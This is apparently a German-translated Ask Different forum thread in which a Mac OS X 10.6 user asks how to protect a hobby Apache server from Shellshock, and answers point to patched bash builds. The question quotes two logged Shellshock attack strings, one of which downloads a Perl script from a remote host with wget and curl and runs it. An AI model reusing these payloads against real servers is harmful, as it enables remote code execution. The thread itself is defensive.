Apple Shellshock-Patch für 10.6?

Ich betreibe hauptsächlich als Hobby einen kleinen HTTP-Server (Apache) auf meinem Mac. Wenn es kompromittiert wird, ist das nicht das Ende der Welt, aber es ist etwas, das ich auf jeden Fall gerne verhindern würde. Ich habe einen launchctl-Job eingerichtet, um die Apache-Protokolldatei auf mögliche Anfragen im Zusammenhang mit Shellshock zu überprüfen, und letzte Nacht habe ich zwei verwandte Einträge erhalten:

82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Die erste sieht harmlos aus und die IP hostet eine sehr legitim aussehende Website, die behauptet, dass ihre Anfragen nur zu Forschungszwecken dienen. Der zweite ist jedoch eine andere Geschichte, er versucht, ein Perl-Skript herunterzuladen und auszuführen. Glücklicherweise habe ich wget nicht installiert, also hat dieser Angriff nicht funktioniert, aber es scheint, als wäre es nur eine Frage der Zeit, bis ich eine Anfrage wie diese erhalte, die etwas Schaden anrichtet.

Apple hat gerade Patches für OS X 10.7 und höher veröffentlicht, aber leider verwende ich 10.6. Welche einfachen und zuverlässigen Maßnahmen kann ich ergreifen (dh bash nicht neu kompilieren ), um meine Risiken zu verringern?

Korrigieren Sie mich, wenn ich falsch liege, aber nur Bash ist anfällig, oder? Ich habe gehört, dass die Installation einer anderen Shell wie dash, csh oder was auch immer hilft, es zu mildern. Dies erfordert jedoch möglicherweise noch eine Kompilierung.

Antworten (3)

Wenn Sie Bash nicht selbst neu kompilieren möchten, haben die Leute von TenFourFox (die eine PPC-Version von Firefox erstellen) eine Binärdatei kompiliert, die unter OS X 10.4 - 10.9 sowohl auf PPC- als auch auf Intel-Macs funktioniert, und haben Terminalanweisungen für die Installation:

http://tenfourfox.blogspot.com/2014/09/bashing-bash-one-more-time-updated.html

Zum Zeitpunkt des Schreibens (30. September) haben sie Bash 4.3.27 kompiliert, aber das vermisst noch ein paar Schwachstellen, die auch der offizielle Apple-Patch übersehen hat. Es ist also besser als nichts, aber Sie sollten weiterhin nach zukünftigen Updates Ausschau halten.

Perfekt! Sehr geschätzt; klare Anweisungen und sie funktionierten genau wie angekündigt.

Sie können möglicherweise versuchen, bash über diesen Link selbst neu zu kompilieren. Es patcht die anfällige Bash-Version, aber die neue Version ist nicht von Apple signiert und könnte möglicherweise Dinge beschädigen.

Überprüfen Sie den Abschnitt „System-Binärdateien“ dieser Antwort. Es funktioniert für 10.6.8, vorausgesetzt, Sie haben Xcode installiert.

https://apple.stackexchange.com/a/146851/96606

Antworten auf Ask Different müssen mehr als nur ein Link sein. Es ist in Ordnung, einen Link einzufügen, aber bitte fassen Sie ihn in der Antwort zusammen oder fassen Sie ihn aus. Die Idee ist, die Antwort allein stehen zu lassen.
Apple Shellshock-Patch für 10.6?
AntwortenHierDatenschutz-Bestimmungen1y, 0v